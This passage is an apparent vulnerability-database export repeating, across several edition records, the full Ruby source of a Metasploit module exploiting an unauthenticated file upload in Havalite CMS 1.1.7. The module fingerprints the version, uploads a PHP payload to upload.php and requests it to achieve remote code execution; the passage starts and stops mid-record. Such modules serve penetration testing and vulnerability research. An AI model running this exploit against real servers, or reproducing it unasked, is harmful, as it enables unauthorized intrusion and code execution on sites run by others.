"lastseen": "2018-02-25T12:54:32", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-25T12:54:32", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-25T12:54:32", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-03T13:00:11", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-03T13:00:11", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-03T13:00:11", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-03T14:57:52", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-03T14:57:52", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-03T14:57:52", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T07:03:42", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-12T07:03:42", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-12T07:03:42", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T11:07:49", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-12T11:07:49", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-12T11:07:49", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-16T01:52:22", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-16T01:52:22", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-16T01:52:22", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-16T03:45:49", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-16T03:45:49", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif 